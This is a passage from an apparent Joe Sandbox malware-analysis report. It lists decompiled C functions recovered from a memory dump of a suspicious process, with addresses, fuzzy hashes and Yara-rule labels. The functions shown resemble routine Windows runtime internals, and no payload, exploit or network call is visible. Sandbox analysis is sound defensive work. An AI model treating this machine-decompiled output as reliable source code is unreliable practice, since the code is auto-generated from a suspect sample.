					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E00B58D34(_v8, _t80);
					}
					E00AA2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E00A9FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E00B58833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E00A9FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E00ACB180();
						if(_a4 != 0) {
							E00AA2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E00AABB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E00AABB2D(_t16, _t15);
						E00AAB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E00A9FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E00A9FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E00A9FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                    0x00aac18d
                                                    0x00aac18f
                                                    0x00aac191
                                                    0x00aac19b
                                                    0x00aac1a0
                                                    0x00aac1d4
                                                    0x00aac1de
                                                    0x00af2d6e
                                                    0x00aac1e4
                                                    0x00aac1e4
                                                    0x00aac1e4
                                                    0x00aac1ec
                                                    0x00af2d7d
                                                    0x00af2d7d
                                                    0x00aac1f3
                                                    0x00aac1ff
                                                    0x00af2d88
                                                    0x00af2d8d
                                                    0x00af2d94
                                                    0x00af2d94
                                                    0x00af2d9f
                                                    0x00af2da4
                                                    0x00af2dab
                                                    0x00af2db0
                                                    0x00af2db2
                                                    0x00af2db3
                                                    0x00af2db4
                                                    0x00af2dbc
                                                    0x00af2dc3
                                                    0x00af2dc3
                                                    0x00aac205
                                                    0x00aac205
                                                    0x00aac208
                                                    0x00aac20e
                                                    0x00aac211
                                                    0x00aac216
                                                    0x00aac219
                                                    0x00aac21f
                                                    0x00aac222
                                                    0x00aac22c
                                                    0x00aac234
                                                    0x00aac23a
                                                    0x00aac23f
                                                    0x00aac245
                                                    0x00aac24b
                                                    0x00aac251
                                                    0x00aac25a
                                                    0x00aac276
                                                    0x00aac27d
                                                    0x00aac27d
                                                    0x00aac25c
                                                    0x00aac25c
                                                    0x00000000
                                                    0x00aac25e
                                                    0x00aac1a4
                                                    0x00aac1aa
                                                    0x00aac1b3
                                                    0x00aac265
                                                    0x00aac26c
                                                    0x00aac26c
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction ID: 16f7d3798fc13f0837ecdcce2696718c2c56c88a682688b9f9301bc0bcdbb928
                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction Fuzzy Hash: CB314B7270154ABEEB04EBB4C581BF9F7A4BF43310F14416AE41C97283DB385959D7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABA70E Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E00ABA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0xb77b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0xb77b10 = 8;
					 *0xb77b14 = 0xb77b0c;
					 *0xb77b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E00ABA990(0xb77b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L00ABA840(__edx, __ecx, __ecx, _t52, 0xb77b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0xb77b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0xb77b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0xb77b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L00AA4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0xb77b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E00ACF3E0(_t50,  *0xb77b14, _t8 >> 3);
						_t28 =  *0xb77b14; // 0x0
						__eflags = _t28 - 0xb77b0c;
						if(_t28 != 0xb77b0c) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0xb77b14 = _t50;
						_t48 = _v12;
						 *0xb77b10 = _t9;
						goto L6;
					}
					 *0xb77b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                    0x00aba713
                                                    0x00aba714
                                                    0x00aba717
                                                    0x00aba71d
                                                    0x00aba720
                                                    0x00aba722
                                                    0x00aba727
                                                    0x00aba74a
                                                    0x00aba754
                                                    0x00aba75e
                                                    0x00aba768
                                                    0x00aba76a
                                                    0x00aba773
                                                    0x00aba78b
                                                    0x00aba790
                                                    0x00aba792
                                                    0x00aba741
                                                    0x00aba741
                                                    0x00aba743
                                                    0x00aba749
                                                    0x00aba749
                                                    0x00aba732
                                                    0x00aba73a
                                                    0x00aba797
                                                    0x00aba79d
                                                    0x00aba7a3
                                                    0x00aba7a9
                                                    0x00aba7b6
                                                    0x00aba7bc
                                                    0x00aba7ca
                                                    0x00aba7e0
                                                    0x00aba7e2
                                                    0x00aba7e4
                                                    0x00af9bf2
                                                    0x00000000
                                                    0x00af9bf2
                                                    0x00aba7ed
                                                    0x00aba7f2
                                                    0x00aba800
                                                    0x00aba805
                                                    0x00aba80d
                                                    0x00aba812
                                                    0x00af9c08
                                                    0x00af9c08
                                                    0x00aba818
                                                    0x00aba81b
                                                    0x00aba821
                                                    0x00aba824
                                                    0x00000000
                                                    0x00aba824
                                                    0x00aba7ae
                                                    0x00000000
                                                    0x00aba7ae
                                                    0x00aba73c
                                                    0x00aba73e
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4fbcfaf49b2f0276dfd92962f70ed8deff956e6f74a4c5163423619aa7fcbf6
                                                    • Instruction ID: 9d6570158c30a6b8170a97932121de15d425e94fac6856ec475a42bce8eee380
                                                    • Opcode Fuzzy Hash: e4fbcfaf49b2f0276dfd92962f70ed8deff956e6f74a4c5163423619aa7fcbf6
                                                    • Instruction Fuzzy Hash: 9D3101B1668200AFC710CF08ECA0F6A77F9FB94700F2049AAE018C7351EF709980CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB61A0 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 97%
                                                    			E00AB61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E00AB5E50(0xa667cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E00B59D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E00A8F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                    0x00ab61b3
                                                    0x00ab61b5
                                                    0x00ab61bd
                                                    0x00ab61c3
                                                    0x00ab61c7
                                                    0x00ab61d2
                                                    0x00ab61ff
                                                    0x00ab61ff
                                                    0x00ab6201
                                                    0x00ab6207
                                                    0x00ab6207
                                                    0x00ab61d4
                                                    0x00ab61d9
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab61df
                                                    0x00ab61e2
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab61e6
                                                    0x00ab61e8
                                                    0x00ab61ee
                                                    0x00ab61ee
                                                    0x00ab61f9
                                                    0x00af762f
                                                    0x00af7632
                                                    0x00af7635
                                                    0x00af7639
                                                    0x00af7640
                                                    0x00af766e
                                                    0x00af7675
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7681
                                                    0x00af7689
                                                    0x00af768d
                                                    0x00af7691
                                                    0x00af7695
                                                    0x00af7699
                                                    0x00af76af
                                                    0x00af76b5
                                                    0x00af76b7
                                                    0x00af76b7
                                                    0x00af76d7
                                                    0x00af76dc
                                                    0x00000000
                                                    0x00af76dc
                                                    0x00af76a2
                                                    0x00af76a9
                                                    0x00af7651
                                                    0x00af7653
                                                    0x00af7653
                                                    0x00af7656
                                                    0x00af7656
                                                    0x00000000
                                                    0x00af7656
                                                    0x00af7644
                                                    0x00af7646
                                                    0x00af7648
                                                    0x00af7648
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00b6db17c3c4d98fc0fd4aead409539e2753a21f7ad319415faf2031532e7dc1
                                                    • Instruction ID: 00215a6469314f480201ab16d6085083a82f1dfeab5b31dc294d6904f417b75a
                                                    • Opcode Fuzzy Hash: 00b6db17c3c4d98fc0fd4aead409539e2753a21f7ad319415faf2031532e7dc1
                                                    • Instruction Fuzzy Hash: 0C316771A097018FD360CF59C900B6AB7E9FB88B00F15496DF998DB292E7B4EC04CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8AA16 Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E00A8AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0xb7d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0xb77b9c; // 0x0
					_t53 = L00AA4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E00ACB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E00ACF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L00A96C59(_t53, _t51, _t58) != 0) {
							_t28 = E00AB5E50(0xa6c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E00ABB230(_v32, _v28, 0xa6c2d8, 1,  &_v24);
								_t28 = E00A8F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                    0x00a8aa25
                                                    0x00a8aa29
                                                    0x00a8aa2d
                                                    0x00a8aa30
                                                    0x00a8aa37
                                                    0x00a8aa3c
                                                    0x00ae4458
                                                    0x00ae4458
                                                    0x00ae4472
                                                    0x00ae4474
                                                    0x00ae4476
                                                    0x00a8aa64
                                                    0x00a8aa74
                                                    0x00ae447c
                                                    0x00ae4483
                                                    0x00ae4492
                                                    0x00a8aa52
                                                    0x00a8aa54
                                                    0x00a8aa5e
                                                    0x00ae44a8
                                                    0x00ae44ad
                                                    0x00ae44af
                                                    0x00ae44b6
                                                    0x00ae44b6
                                                    0x00ae44b9
                                                    0x00ae44bc
                                                    0x00ae44cd
                                                    0x00ae44d3
                                                    0x00ae44d6
                                                    0x00ae44e1
                                                    0x00ae44e1
                                                    0x00ae44e6
                                                    0x00ae44e8
                                                    0x00ae44fb
                                                    0x00ae44fb
                                                    0x00ae44e8
                                                    0x00000000
                                                    0x00a8aa5e
                                                    0x00ae4476
                                                    0x00a8aa42
                                                    0x00a8aa46
                                                    0x00a8aa48
                                                    0x00a8aa4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39900a8e202508485bf4b43c55867d075bf04df948e4dd4167a4b30e2e72480f
                                                    • Instruction ID: a899d54dcfbb3cc3e310497c8effda98aafb97eefc45e476f92a9852046df0d9
                                                    • Opcode Fuzzy Hash: 39900a8e202508485bf4b43c55867d075bf04df948e4dd4167a4b30e2e72480f
                                                    • Instruction Fuzzy Hash: 9631E871A00219ABDF14AF64CE42ABFB3B9FF04700F01446AF805DB191E7749D10DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC8EC7 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00AC8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0xb7d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E00AB4E70(0xb786e4, 0xac9490, 0, 0);
					if( *0xb753e8 > 5 && E00AC8F33(0xb753e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0xb753e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0xb753e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0xa6bc46;
						_t48 = E00B07B9C(0xb753e8, 0xa6bc46, _t67, 0xb753e8, _t70,  &_v140);
					}
				}
				return E00ACB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                    0x00ac8ec7
                                                    0x00ac8ed9
                                                    0x00ac8edc
                                                    0x00ac8ee6
                                                    0x00ac8ee9
                                                    0x00ac8eee
                                                    0x00ac8efc
                                                    0x00ac8f08
                                                    0x00b01349
                                                    0x00b01353
                                                    0x00b0135d
                                                    0x00b01366
                                                    0x00b0136f
                                                    0x00b01375
                                                    0x00b0137c
                                                    0x00b01385
                                                    0x00b01390
                                                    0x00b01391
                                                    0x00b0139c
                                                    0x00b0139d
                                                    0x00b013a6
                                                    0x00b013ac
                                                    0x00b013b2
                                                    0x00b013b5
                                                    0x00b013bc
                                                    0x00b013bf
                                                    0x00b013c2
                                                    0x00b013c5
                                                    0x00b013c8
                                                    0x00b013cb
                                                    0x00b013ce
                                                    0x00b013d1
                                                    0x00b013d4
                                                    0x00b013d7
                                                    0x00b013da
                                                    0x00b013dd
                                                    0x00b013e0
                                                    0x00b013e3
                                                    0x00b013e6
                                                    0x00b013e9
                                                    0x00b013f6
                                                    0x00b01400
                                                    0x00b01400
                                                    0x00ac8f08
                                                    0x00ac8f32

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a18f37bde99e775617f67d35cc98a3f8dbacba5205c478f6867ef07820e3f250
                                                    • Instruction ID: b3cc51a2ab92136db471f26b2c90901b8d284dc1ca5e088d33d6604a64059683
                                                    • Opcode Fuzzy Hash: a18f37bde99e775617f67d35cc98a3f8dbacba5205c478f6867ef07820e3f250
                                                    • Instruction Fuzzy Hash: 4341B2B1D002189FDB24CFAAD981AADFBF4FB48300F5081AEE509A7241DB745A84CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC4A2C Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E00AC4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0xb7d360 ^ _t62;
				_v8 =  *0xb7d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E00AA2280(_t26, 0xb78608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E00A9FFB0(_t41, _t51, 0xb78608);
						L2:
						 *0xb7b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E00ACB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E00AA2280(_t28, 0xb78608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E00A9FFB0(_t42, _t53, 0xb78608);
							if(_t53 != 0) {
								L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E00A9FFB0(_t41, _t51, 0xb78608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                    0x00ac4a2c
                                                    0x00ac4a34
                                                    0x00ac4a3c
                                                    0x00ac4a3e
                                                    0x00ac4a48
                                                    0x00ac4a4b
                                                    0x00ac4a4d
                                                    0x00ac4a51
                                                    0x00ac4a9c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ac4aa3
                                                    0x00ac4aa8
                                                    0x00ac4aad
                                                    0x00ac4ab1
                                                    0x00ac4ade
                                                    0x00ac4ae3
                                                    0x00ac4a5a
                                                    0x00ac4a62
                                                    0x00ac4a6a
                                                    0x00ac4a6e
                                                    0x00aff203
                                                    0x00ac4a84
                                                    0x00ac4a88
                                                    0x00ac4a89
                                                    0x00ac4a8a
                                                    0x00ac4a95
                                                    0x00ac4a95
                                                    0x00ac4a79
                                                    0x00ac4a80
                                                    0x00ac4af2
                                                    0x00ac4af4
                                                    0x00ac4af9
                                                    0x00ac4aff
                                                    0x00ac4b01
                                                    0x00ac4b03
                                                    0x00ac4b08
                                                    0x00aff20a
                                                    0x00aff212
                                                    0x00aff216
                                                    0x00aff216
                                                    0x00ac4b08
                                                    0x00ac4b13
                                                    0x00ac4b1a
                                                    0x00aff229
                                                    0x00aff229
                                                    0x00ac4b1a
                                                    0x00ac4a82
                                                    0x00000000
                                                    0x00ac4a82
                                                    0x00ac4ab7
                                                    0x00ac4acd
                                                    0x00ac4acd
                                                    0x00ac4ad5
                                                    0x00ac4ada
                                                    0x00000000
                                                    0x00ac4ada
                                                    0x00ac4ac2
                                                    0x00ac4acb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ac4acb
                                                    0x00ac4a53
                                                    0x00ac4a53
                                                    0x00ac4a58
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4b017f4f240ef250678207329a10448907ee9c8a4eaab5d1d37d8ed4225108db
                                                    • Instruction ID: 18a2e3d146e2ccb85c566fba6bca6c7f60eca3389166af30ccaa60cacc5cc5d0
                                                    • Opcode Fuzzy Hash: 4b017f4f240ef250678207329a10448907ee9c8a4eaab5d1d37d8ed4225108db
                                                    • Instruction Fuzzy Hash: B53102322857109FCB219F54CA55F6ABBE4FF89B50F12446DF86A4B691CB70DC00CB89
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABE730 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E00ABE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E00AC9670() < 0) {
					L00ADDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0xb77b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L00AA4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M00ABE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















